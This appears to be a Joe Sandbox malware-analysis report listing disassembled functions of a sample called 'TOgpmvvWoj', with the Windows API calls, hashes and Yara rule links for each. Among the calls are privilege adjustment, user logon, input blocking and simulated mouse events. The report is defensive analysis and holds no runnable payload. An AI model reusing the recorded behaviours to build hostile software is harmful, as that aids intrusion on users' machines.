                                            • Instruction ID: fad88c021f404d7173e69fe2fe4912342d29e94c1f539a2bb3833e3d077651ea
                                            • Opcode Fuzzy Hash: f8c63b4a49be3e95fd15b5058fc2ef867566dcf9a48d11927ce7ed165039ba3b
                                            • Instruction Fuzzy Hash: 4FF0823564422DFBDB209FA4DC48FEE776DFF08761F008266F909E6191D6309944CBA1
                                            Function 00E68713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                            Download Yara Rule
                                            APIs
                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E68851), ref: 00E68728
                                            • CloseHandle.KERNEL32(?,?,00E68851), ref: 00E6873A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AdjustCloseHandlePrivilegesToken
                                            • String ID:
                                            • API String ID: 81990902-0
                                            • Opcode ID: e73e159437c208314ded51e5fe969734c2f601478b581e92727c1b5906ef76cc
                                            • Instruction ID: 9cfa0df65c30a361147f4f76d04b23470e1ed8d1b7a06331b8a831b6e35bb67c
                                            • Opcode Fuzzy Hash: e73e159437c208314ded51e5fe969734c2f601478b581e92727c1b5906ef76cc
                                            • Instruction Fuzzy Hash: AFE0B676010610EFE7252B61ED09D777BE9EB04395B25896EF896D0470DB62ACA0EB10
                                            Function 00E3A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E38F97,?,?,?,00000001), ref: 00E3A39A
                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E3A3A3
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: d67a81a662e8ab82742450ac15d8724188f3db44e6e7dbb0574f924ed69a0fe1
                                            • Instruction ID: ae069e0861b16856e4cc055b76c1a5e650ac65db145f1f3423e6b2b120d25ea9
                                            • Opcode Fuzzy Hash: d67a81a662e8ab82742450ac15d8724188f3db44e6e7dbb0574f924ed69a0fe1
                                            • Instruction Fuzzy Hash: 12B09231054208EFCA006BA2EC09B883F68EB44BA2F404023F60DD4060CB6654A48A91
                                            Function 00E3F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c23fb1b286e421f84376b424c8f42c0041575274a7a84ad7b4f45894b9c185a9
                                            • Instruction ID: cc63ad512d66945c2121c3351973b21cc7ed630174b4860059202fa1e3242653
                                            • Opcode Fuzzy Hash: c23fb1b286e421f84376b424c8f42c0041575274a7a84ad7b4f45894b9c185a9
                                            • Instruction Fuzzy Hash: 85324562D69F014DD7239635CC36336A649AFBB3C4F15E737E819B5AA6EB28D4838100
                                            Function 00E4267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e9cb86fa1842b1c068b174d76efc013d06a7bd12bcf300c45e629b82ae3e39e6
                                            • Instruction ID: f4bd55d4c485e603e1f54764a388c36b8762ce07668b54aa86454e1e2dca5c8c
                                            • Opcode Fuzzy Hash: e9cb86fa1842b1c068b174d76efc013d06a7bd12bcf300c45e629b82ae3e39e6
                                            • Instruction Fuzzy Hash: 7CB11420D2AF414DD763963A8831336BB8CAFBB2C5F55D72BFC2670D22EB2195878141
                                            Function 00E841FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            • BlockInput.USER32(00000001), ref: 00E84218
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: BlockInput
                                            • String ID:
                                            • API String ID: 3456056419-0
                                            • Opcode ID: 8c81307bfff05ad4e2c594e2495a89f097e2d25fef594f73071db5c383eed9f0
                                            • Instruction ID: de498a6383a042d9bc1de735c7c48817cfa33604705a9b9876a93f85cbea35cf
                                            • Opcode Fuzzy Hash: 8c81307bfff05ad4e2c594e2495a89f097e2d25fef594f73071db5c383eed9f0
                                            • Instruction Fuzzy Hash: F5E04FB12442159FC710EF5AD844A9AF7E8EF94760F009026FC4EE7362DA70F8448BE0
                                            Function 00E74EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00E74F18
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: mouse_event
                                            • String ID:
                                            • API String ID: 2434400541-0
                                            • Opcode ID: 757c64a46179020df9fdb13e572ca509595c0bb98833dc0c23431c6cb901ba91
                                            • Instruction ID: c1860a90327fdc4b70edcc9f0cae80316db48fb35901ae9be19cd037ac2b1102
                                            • Opcode Fuzzy Hash: 757c64a46179020df9fdb13e572ca509595c0bb98833dc0c23431c6cb901ba91
                                            • Instruction Fuzzy Hash: F9D067E4364609B9E91D4B20BC1BBB61109E340795FA4F98AB209B94D19AA56854A035
                                            Function 00E68C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E688D1), ref: 00E68CB3
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: LogonUser
                                            • String ID:
                                            • API String ID: 1244722697-0
                                            • Opcode ID: 3ab381b1738cbf847bf59b33cb0fab921b399b038c91912395dfa805d5406f26
                                            • Instruction ID: 64619385caa85b855eda2f21c4124983d9697437a5ba4f4916a66eee59d027bf
                                            • Opcode Fuzzy Hash: 3ab381b1738cbf847bf59b33cb0fab921b399b038c91912395dfa805d5406f26
                                            • Instruction Fuzzy Hash: 44D05E3226450EAFEF018EA4DC01EAE3B69EB04B01F408112FE15D50A1C775D835AB60
                                            Function 00E52230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetUserNameW.ADVAPI32(?,?), ref: 00E52242
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: NameUser
                                            • String ID:
                                            • API String ID: 2645101109-0
                                            • Opcode ID: 9008a752809a5cdb19798ffe489c4d31f7acb7cee9c9cf73db24383f6063fa51
                                            • Instruction ID: 0274595b567ff99fab52f481f0daed217277e2fd05285179a36983e4f5195613
                                            • Opcode Fuzzy Hash: 9008a752809a5cdb19798ffe489c4d31f7acb7cee9c9cf73db24383f6063fa51
                                            • Instruction Fuzzy Hash: 1EC048F1C00109DBDB05DBA0DA88EEEB7BCAB08305F2044A6E502F2100E7749B488A71
                                            Function 00E3A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E3A36A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: afec495989fddc838a6425e8be42a1a4ba94f57a9a8f8bd95b74599f57066436
                                            • Instruction ID: ff34f126b451e02379428ab1ceb7ecfa29275ec19490ad41278c2014ad1760d3
                                            • Opcode Fuzzy Hash: afec495989fddc838a6425e8be42a1a4ba94f57a9a8f8bd95b74599f57066436
                                            • Instruction Fuzzy Hash: 68A0113000020CEB8A002BA2EC08888BFACEB002A0B008022F80C800228B32A8A08A80
                                            Function 00E28A0E Relevance: .6, Instructions: 608COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bce3cdc573ce5f4a13a1735a3f5c9ba43c76f1e4707970484ec70719c2b3a265
                                            • Instruction ID: a2a58e60e2cdcf3d6325c64c873151459f217c75d8fe1ea29851e9f6546d50e6
                                            • Opcode Fuzzy Hash: bce3cdc573ce5f4a13a1735a3f5c9ba43c76f1e4707970484ec70719c2b3a265
                                            • Instruction Fuzzy Hash: 9E224B32706635CBDF288F18F5D56BDB7A1FB01388F28646AD442BB691DB309D81CB61
                                            Function 00E32405 Relevance: .3, Instructions: 345COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                            • Instruction ID: e9e338b493b534573f08424f53e63eca776c113b990d01890a3da42ec4a8734b
                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                            • Instruction Fuzzy Hash: 85C1A4322051930ADF2D4639D43803EBEE15EA27B5B1A279DE4F3EB5D4EF20D524E620
                                            Function 00E3283A Relevance: .3, Instructions: 341COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                            • Instruction ID: 965f61504c472c839a1b5ec23d59f59cc7b5d453a096780f251ab1e0b14717f9
                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                            • Instruction Fuzzy Hash: 1DC196322051930ADF2D463A943813EFFE15EA27B5B1A279DE4F2EB5C4EF20D524D620
                                            Function 00D435E0 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d40000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                            • Instruction ID: 682c9b22ff7683bfa7acf1458b4dabef064d1f0a59b003f3327514d8e9d9c2a5
                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                            • Instruction Fuzzy Hash: 0C41B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB50
                                            Function 00D434D0 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d40000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                            • Instruction ID: 642428498b6b112c16334def210240fb12dfd01b83cb72ed7a217a5dcbe48613
                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                            • Instruction Fuzzy Hash: 67019D78A04209EFCB44DF98C5909AEF7B5FB48310F248699E809A7741E730AE51DF90
                                            Function 00D43470 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d40000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                            • Instruction ID: c9db98e25797c00c84c4b9829f3a7614cc951e48ce62fb26f9391008b6be2cea
                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                            • Instruction Fuzzy Hash: 2E019D78A04209EFCB48DF98C5909AEF7B5FF48310F248599E909A7741E730AE41DB90
                                            Function 00D41E70 Relevance: .0, Instructions: 6COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d40000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                            Function 00E937F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CharUpperBuffW.USER32(?,?,00E9F910), ref: 00E938AF
                                            • IsWindowVisible.USER32(?), ref: 00E938D3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: BuffCharUpperVisibleWindow
                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                            • API String ID: 4105515805-45149045
                                            • Opcode ID: 231cab3d6f4cf7e02020f230c18bb6823819b4e3674be052d84ff96ccab01262
                                            • Instruction ID: 94a72c80fc61026c7364e52c207a3d84557bde67400fad331b05da7f57a6e8c3
                                            • Opcode Fuzzy Hash: 231cab3d6f4cf7e02020f230c18bb6823819b4e3674be052d84ff96ccab01262
                                            • Instruction Fuzzy Hash: B3D163302043059BCF14EF20C556AAEBBE9AF94344F11645CB8967B3A3DB31EE4ACB51
                                            Function 00E9A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetTextColor.GDI32(?,00000000), ref: 00E9A89F
                                            • GetSysColorBrush.USER32(0000000F), ref: 00E9A8D0
                                            • GetSysColor.USER32(0000000F), ref: 00E9A8DC
                                            • SetBkColor.GDI32(?,000000FF), ref: 00E9A8F6
                                            • SelectObject.GDI32(?,?), ref: 00E9A905
                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00E9A930
                                            • GetSysColor.USER32(00000010), ref: 00E9A938
                                            • CreateSolidBrush.GDI32(00000000), ref: 00E9A93F
                                            • FrameRect.USER32(?,?,00000000), ref: 00E9A94E
                                            • DeleteObject.GDI32(00000000), ref: 00E9A955
                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00E9A9A0
                                            • FillRect.USER32(?,?,?), ref: 00E9A9D2
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00E9A9FD
                                              • Part of subcall function 00E9AB60: GetSysColor.USER32(00000012), ref: 00E9AB99
                                              • Part of subcall function 00E9AB60: SetTextColor.GDI32(?,?), ref: 00E9AB9D
                                              • Part of subcall function 00E9AB60: GetSysColorBrush.USER32(0000000F), ref: 00E9ABB3
                                              • Part of subcall function 00E9AB60: GetSysColor.USER32(0000000F), ref: 00E9ABBE
                                              • Part of subcall function 00E9AB60: GetSysColor.USER32(00000011), ref: 00E9ABDB
                                              • Part of subcall function 00E9AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E9ABE9
                                              • Part of subcall function 00E9AB60: SelectObject.GDI32(?,00000000), ref: 00E9ABFA
                                              • Part of subcall function 00E9AB60: SetBkColor.GDI32(?,00000000), ref: 00E9AC03
                                              • Part of subcall function 00E9AB60: SelectObject.GDI32(?,?), ref: 00E9AC10
                                              • Part of subcall function 00E9AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00E9AC2F
                                              • Part of subcall function 00E9AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E9AC46
                                              • Part of subcall function 00E9AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00E9AC5B
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                            • String ID:
                                            • API String ID: 4124339563-0
                                            • Opcode ID: 872848e88e0c6b98f099f6da4cc40c60ed328910210f76bd056479525be25a82
                                            • Instruction ID: 38955404a93110be199f11533b3cbfb556b580690e87283e2afaafa87d9141f2
                                            • Opcode Fuzzy Hash: 872848e88e0c6b98f099f6da4cc40c60ed328910210f76bd056479525be25a82
                                            • Instruction Fuzzy Hash: 32A18271008301FFDB109F65DC08A6B7BA9FF88325F145A2BF962E61A1D771D948CB92
                                            Function 00E12C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • DestroyWindow.USER32(?,?,?), ref: 00E12CA2
                                            • DeleteObject.GDI32(00000000), ref: 00E12CE8
                                            • DeleteObject.GDI32(00000000), ref: 00E12CF3
                                            • DestroyIcon.USER32(00000000,?,?,?), ref: 00E12CFE
                                            • DestroyWindow.USER32(00000000,?,?,?), ref: 00E12D09
                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E4C68B
                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E4C6C4
                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E4CAED
                                              • Part of subcall function 00E11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E12036,?,00000000,?,?,?,?,00E116CB,00000000,?), ref: 00E11B9A
                                            • SendMessageW.USER32(?,00001053), ref: 00E4CB2A
                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E4CB41
                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E4CB57
                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E4CB62
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
